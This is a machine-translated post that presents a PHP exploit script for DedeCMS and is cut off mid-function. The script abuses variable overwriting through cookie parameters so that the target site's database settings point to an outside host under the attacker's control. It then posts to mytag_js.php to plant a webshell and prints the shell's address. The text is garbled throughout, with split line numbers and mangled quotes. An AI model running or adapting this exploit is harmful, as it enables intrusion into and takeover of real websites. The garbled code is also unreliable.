Author: the Black kid
dede recently the explosion of the cave, but the exp is also pretty practical huh!
0 1 #! usr/bin/php-w
0 2 <? php
0 3 error_reporting(E_ERROR);
0 4 set_time_limit(0);
0 5 print_r(’
0 6 DEDEcms Variable Coverage
0 7 Exploit Author: www.heixiaozi.com www.webvul.com
0 8 );
0 9 echo"\r\n";
1 0 if($argv[2]==null){
1 1 print_r(’
1 2 ±--------------------------------------------------------------------------+
1 3 Usage: php '.$ argv[0].'url aid path
1 4 aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
1 5 Example:
1 6 php ‘.$ argv[0].’ www.site.com 1 old
1 7 ±--------------------------------------------------------------------------+
1 8 ');
1 9 exit;
2 0 }
2 1 $url=$argv[1];
2 2 $aid=$argv[2];
2 3 $path=$argv[3];
2 4 $exp=Getshell($url,$aid,$path);
2 5 if(strpos($exp,“OK”)>1 2){
2 6 echo"[*] Exploit Success \n";
2 7 if($aid==1)echo"[*] Shell:“.$ url.”/$ path/data/cache/fuck. php\n";
2 8
2 9 if($aid==2)echo"[*] Shell:“.$ url.”/$ path/fuck. php\n";
3 0
3 1 if($aid==3)echo"[*] Shell:“.$ url.”/$ path/plus/fuck. php\n";
3 2
3 3 }else{
3 4 echo"[*] Exploit Failed \n";
3 5 }
3 6
3 7
3 8 functionGetshell($url,$aid,$path){
3 9 $id=$aid;
4 0 $host=$url;
4 1 $port=“8 0”;
4 2 $content=“doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js. php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=Trojan&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=Trojan&COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede&nocache=true&QuickSearchBtn=%CC%E1%BD%BB”;
4 3 $data= “POST /$path/plus/mytag_js. php? aid=”.$ id." HTTP/1.1\r\n";
4 4 $data.= “Host: “.$ host.”\ r\n”;
4 5 $data.= “User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1\r\n”;
4 6 $data.= “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n”;
4 7 $data.= “Accept-Language: EN-us,EN;q=0.5\r\n”;
4 8 //$data .= “Accept-Encoding: gzip,deflate\r\n”;
4 9 $data.= “Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n”;
5 0 $data.= “Connection: keep-alive\r\n”;
5 1 $data.= “Content-Type: application/x-www-form-urlencoded\r\n”;
5 2 $data.= “Content-Length: “. strlen($content).”\ r\n\r\n”;
5 3 $data.= $content.“\ r\n”;
5 4 $ock=fsockopen($host,$port);